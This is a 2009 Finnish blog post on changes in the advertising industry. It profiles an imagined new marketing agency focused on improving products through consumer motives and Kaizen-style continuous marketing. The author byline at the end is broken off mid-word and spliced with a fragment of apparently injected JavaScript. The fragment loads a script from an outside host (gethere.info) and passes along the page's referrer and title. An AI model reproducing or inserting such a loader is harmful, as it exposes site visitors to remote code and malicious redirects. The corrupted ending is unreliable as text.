3.9.2009

paranoia-silma

Mainosala on murroksessa. Freelancereiden ja omia mainostoimistojaan suunnittelevien henkilöiden määrä on kasvanut viimeisen vuoden aikana, joten se että uusi toimisto avataan syksyllä Helsinkiin tulee yhtä varmasti kuin sade lokakuussa. Kuinka paljon sataa ja mitä, jää tosin nähtäväksi.

Toivottavasti markkinointitaivaalle nousee nykyisten ja tulevien sammuneiden tähtien rinnalle kirkkaasti loistavia joitain. Nämä jotkut ovat niitä jotka ovat oivaltaneet ettei kannata tehdä vääriä asioita, vaikka olisivatkin niissä tosi hyviä. Nämä jotkut kykenevät tuomaan uutta siihen mitä tehdä ja miten toimia. Ennen kaikkea nämä uskaltavat muuttua ja jättää jotain turvallista taakseen. Jep jep ja niinpä. Näin se on ennenkin tehty.

Ohessa kuitenkin kuvaus uudesta alan toimijasta, markkinoinnin asiantuntijoista jotka keskittyvät tuotteen parantamiseen:

Mainostoimiston tappaja #1

Tekee:
Kuluttajamotiiveista johdettuja ratkaisuja joko uuden tai olemassa olevan tuotteen paremman kaupallisen menestyksen saavuttamiseksi eli kasvattaa asiakkaan myyntiä haluttavimmilla tuotteilla.

Ei tee:
Perinteistä väittämismainontaa jossa markkinointiviestintä on irrallinen elementti tai liitännäinen yrityksen / brändin muuhun toimintaan.

Korvaa:
Mainoslähtöisen markkinoinnin suunnittelun.

Täydentää seuraavia asioita:
Pakkaussuunnittelu, palvelumuotoilu, kommunikaatiostrategia, myynnin ja asiakasmarkkinoinnin prosessit ja työkalut, sekä henkilöstön sitouttamisohjelmat.

Toimintaa ohjaava ajatus:
Kaikki lähtee siitä mitä myymme. Ymmärrys siitä mitä itse asiassa olemme myymässä johtaa tekemistä: esim. myymmekö leluja vai leikkejä. Myytävä asia on tehokkaimmillaan se hyöty, tunne tai tuntemus, jonka loppuasiakas saa valitessaan valitun tuotteen tai palvelun.

Ideologia:
Kaizen –ajattelusta johdettu progressiivinen markkinointi, jossa luodaan jatkuvasti kehittyvä tapa markkinoida, ja joka saavuttaa pitkän aikavälin tavoitteet jokapäiväisen toiminnan kautta.

Syy uskoa:
Ensimmäinen toimija joka pystyy yhdistämään projektiivisen tarvemäärityksen markkinoinnin suunnitteluun – omilla työvälineillään, kokeneen henkilökuntansa toimesta.

Tämmöinen on tulossa; vähemmällä jargonilla ja konkrettisemmalla sisällöllä. Toivottavasti tulee useampikin…

Mikko Kaijansinkko on W.Steinmannin strategiajohtajas.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ’&default_keyword=’ + encodeURIComponent(document.title) + ”;